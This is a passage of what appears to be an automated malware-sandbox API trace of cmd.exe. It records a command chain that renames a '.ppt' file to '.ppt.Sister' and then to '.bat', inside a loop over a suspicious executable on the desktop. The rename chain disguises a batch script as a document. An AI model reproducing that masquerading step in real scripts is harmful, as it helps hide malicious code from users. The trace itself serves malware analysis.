lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0b54899, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe0b54899, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7720 [0305.568] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.568] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.568] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\R-mSBlQLI7.ppt", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x310d7e00, ftCreationTime.dwHighDateTime=0x1d5e4e1, ftLastAccessTime.dwLowDateTime=0x98b33c90, ftLastAccessTime.dwHighDateTime=0x1d5e1d3, ftLastWriteTime.dwLowDateTime=0x98b33c90, ftLastWriteTime.dwHighDateTime=0x1d5e1d3, nFileSizeHigh=0x0, nFileSizeLow=0x97ea, dwReserved0=0x4, dwReserved1=0x7, cFileName="R-mSBlQLI7.ppt", cAlternateFileName="R-MSBL~1.PPT")) returned 0x21ed8cc70c0 [0305.568] FindClose (in: hFindFile=0x21ed8cc70c0 | out: hFindFile=0x21ed8cc70c0) returned 1 [0305.568] _wcsnicmp (_String1="R-MSBL~1.PPT", _String2="R-mSBlQLI7.ppt", _MaxCount=0xe) returned 13 [0305.568] malloc (_Size=0x1ff9c) returned 0x21eda2bfc80 [0305.569] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.570] GetProcessHeap () returned 0x21ed8c70000 [0305.571] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45e00 [0305.571] ??_V@YAXPEAX@Z () returned 0x1 [0305.571] ??_V@YAXPEAX@Z () returned 0x1 [0305.571] GetProcessHeap () returned 0x21ed8c70000 [0305.571] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34e20, Size=0x160) returned 0x21ed8d34e20 [0305.571] GetProcessHeap () returned 0x21ed8c70000 [0305.571] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34e20) returned 0x160 [0305.571] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.571] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.571] GetFileType (hFile=0x50) returned 0x2 [0305.571] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.571] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.572] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.572] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.578] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.578] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.578] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.578] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.578] GetFileType (hFile=0x50) returned 0x2 [0305.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.579] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.579] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.579] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.580] GetFileType (hFile=0x50) returned 0x2 [0305.580] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.580] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.580] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d349a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d349a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.581] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"R-mSBlQLI7.ppt\" \"R-mSBlQLI7.ppt.Sister\" ") returned 42 [0305.581] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.581] GetFileType (hFile=0x50) returned 0x2 [0305.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.581] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.581] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.581] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2a) returned 1 [0305.582] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.582] GetFileType (hFile=0x50) returned 0x2 [0305.582] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.582] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.583] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.583] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.583] GetFileType (hFile=0x50) returned 0x2 [0305.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.584] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.584] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.584] GetFileType (hFile=0x50) returned 0x2 [0305.584] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.584] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.585] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.585] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.585] GetFileType (hFile=0x50) returned 0x2 [0305.585] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.585] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.586] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.586] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.593] GetFileType (hFile=0x50) returned 0x2 [0305.593] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.593] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.594] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d34df0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d34df0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.594] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"R-mSBlQLI7.ppt.Sister\" \"R-mSBlQLI7.bat\" ") returned 42 [0305.594] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.594] GetFileType (hFile=0x50) returned 0x2 [0305.594] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.595] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.595] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2a) returned 1 [0305.595] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.596] GetFileType (hFile=0x50) returned 0x2 [0305.596] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.596] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.596] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.596] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.603] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.603] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.603] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.603] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.603] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.603] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.603] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.604] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.604] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.604] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.604] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.604] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.604] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.604] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.604] ??_V@YAXPEAX@Z () returned 0x1 [0305.604] GetProcessHeap () returned 0x21ed8c70000 [0305.604] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb8) returned 0x21ed9374d30 [0305.604] GetProcessHeap () returned 0x21ed8c70000 [0305.604] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9374d30, Size=0x64) returned 0x21ed8d63f50 [0305.604] GetProcessHeap () returned 0x21ed8c70000 [0305.604] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63f50) returned 0x64 [0305.604] GetProcessHeap () returned 0x21ed8c70000 [0305.604] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x6c) returned 0x21ed8d67730 [0305.605] GetProcessHeap () returned 0x21ed8c70000 [0305.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb8) returned 0x21ed93751b0 [0305.605] GetProcessHeap () returned 0x21ed8c70000 [0305.605] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93751b0, Size=0x64) returned 0x21ed8d63fc0 [0305.605] GetProcessHeap () returned 0x21ed8c70000 [0305.605] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63fc0) returned 0x64 [0305.605] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.605] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.605] GetProcessHeap () returned 0x21ed8c70000 [0305.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7720 [0305.605] GetProcessHeap () returned 0x21ed8c70000 [0305.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9371ab0 [0305.605] _wcsicmp (_String1="R-mSBlQLI7.ppt", _String2=".") returned 68 [0305.605] _wcsicmp (_String1="R-mSBlQLI7.ppt", _String2="..") returned 68 [0305.605] GetFileAttributesW (lpFileName="R-mSBlQLI7.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\r-msblqli7.ppt")) returned 0x20 [0305.606] GetProcessHeap () returned 0x21ed8c70000 [0305.606] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93d6b90 [0305.608] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93d6ba0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.608] SetErrorMode (uMode=0x0) returned 0x0 [0305.608] SetErrorMode (uMode=0x1) returned 0x0 [0305.608] GetFullPathNameW (in: lpFileName="R-mSBlQLI7.ppt", nBufferLength=0x7fe7, lpBuffer=0x21eda2bfc80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\R-mSBlQLI7.ppt", lpFilePart=0xa6cf4fd660*="R-mSBlQLI7.ppt") returned 0x28 [0305.608] SetErrorMode (uMode=0x0) returned 0x1 [0305.608] GetProcessHeap () returned 0x21ed8c70000 [0305.608] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed936ffe0 [0305.608] _wcsicmp (_String1="R-mSBlQLI7.ppt", _String2=".") returned 68 [0305.608] _wcsicmp (_String1="R-mSBlQLI7.ppt", _String2="..") returned 68 [0305.608] GetFileAttributesW (lpFileName="R-mSBlQLI7.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\r-msblqli7.ppt")) returned 0x20 [0305.608] ??_V@YAXPEAX@Z () returned 0x1 [0305.608] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.609] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.609] malloc (_Size=0xffce) returned 0x21eda2cfc60 [0305.609] ??_V@YAXPEAX@Z () returned 0x21eda2cfc60 [0305.609] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\R-mSBlQLI7.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\r-msblqli7.ppt")) returned 0x20 [0305.609] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.609] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.610] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\R-mSBlQLI7.ppt", fInfoLevelId=0x1, lpFindFileData=0x21ed9371ac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9371ac0) returned 0x21ed8cc70c0 [0305.610] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.610] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.610] ??_V@YAXPEAX@Z () returned 0x1 [0305.610] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\R-mSBlQLI7.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\r-msblqli7.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\R-mSBlQLI7.ppt.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\r-msblqli7.ppt.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.611] FindNextFileW (in: hFindFile=0x21ed8cc70c0, lpFindFileData=0x21ed9371ac0 | out: lpFindFileData=0x21ed9371ac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x310d7e00, ftCreationTime.dwHighDateTime=0x1d5e4e1, ftLastAccessTime.dwLowDateTime=0x98b33c90, ftLastAccessTime.dwHighDateTime=0x1d5e1d3, ftLastWriteTime.dwLowDateTime=0x98b33c90, ftLastWriteTime.dwHighDateTime=0x1d5e1d3, nFileSizeHigh=0x0, nFileSizeLow=0x97ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="R-mSBlQLI7.ppt", cAlternateFileName="")) returned 0 [0305.613] GetLastError () returned 0x12 [0305.613] FindClose (in: hFindFile=0x21ed8cc70c0 | out: hFindFile=0x21ed8cc70c0) returned 1 [0305.613] ??_V@YAXPEAX@Z () returned 0x1 [0305.613] ??_V@YAXPEAX@Z () returned 0x1 [0305.613] ??_V@YAXPEAX@Z () returned 0x1 [0305.613] ??_V@YAXPEAX@Z () returned 0x1 [0305.613] GetProcessHeap () returned 0x21ed8c70000 [0305.613] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc70c0 [0305.613] GetProcessHeap () returned 0x21ed8c70000 [0305.613] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c956c0, Size=0x16) returned 0x21ed8c958c0 [0305.613] GetProcessHeap () returned 0x21ed8c70000 [0305.613] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c958c0) returned 0x16 [0305.613] GetProcessHeap () returned 0x21ed8c70000 [0305.613] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bf0, Size=0x20) returned 0x21ed8d45e90 [0305.613] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e90) returned 0x20 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61be0 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61be0, Size=0xb2) returned 0x21ed93757b0 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93757b0) returned 0xb2 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34f90 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34f90, Size=0x30) returned 0x21ed8d34f90 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34f90) returned 0x30 [0305.614] GetProcessHeap () returned 0x21ed8c70000 [0305.614] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34fd0 [0305.614] malloc (_Size=0x1ff9c) returned 0x21eda2bfc80 [0305.615] GetProcessHeap () returned 0x21ed8c70000 [0305.615] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93756f0 [0305.615] GetProcessHeap () returned 0x21ed8c70000 [0305.615] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9375630 [0305.615] ??_V@YAXPEAX@Z () returned 0x1 [0305.615] malloc (_Size=0x1ff9c) returned 0x21eda2bfc80 [0305.615] GetProcessHeap () returned 0x21ed8c70000 [0305.615] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375cf0 [0305.615] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda2bfc80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.615] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc72a0 [0305.615] FindClose (in: hFindFile=0x21ed8cc72a0 | out: hFindFile=0x21ed8cc72a0) returned 1 [0305.616] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7180 [0305.616] FindClose (in: hFindFile=0x21ed8cc7180 | out: hFindFile=0x21ed8cc7180) returned 1 [0305.616] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7180 [0305.616] FindClose (in: hFindFile=0x21ed8cc7180 | out: hFindFile=0x21ed8cc7180) returned 1 [0305.616] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.617] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.617] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.617] GetProcessHeap () returned 0x21ed8c70000 [0305.617] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67cb0 [0305.617] ??_V@YAXPEAX@Z () returned 0x1 [0305.617] ??_V@YAXPEAX@Z () returned 0x1 [0305.617] GetProcessHeap () returned 0x21ed8c70000 [0305.617] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34fd0, Size=0x490) returned 0x21ed8d34fd0 [0305.617] GetProcessHeap () returned 0x21ed8c70000 [0305.617] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34fd0) returned 0x490 [0305.617] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.617] GetFileType (hFile=0x50) returned 0x2 [0305.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.617] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.618] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.628] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.628] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.628] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.628] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.628] GetFileType (hFile=0x50) returned 0x2 [0305.628] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.628] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.629] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, 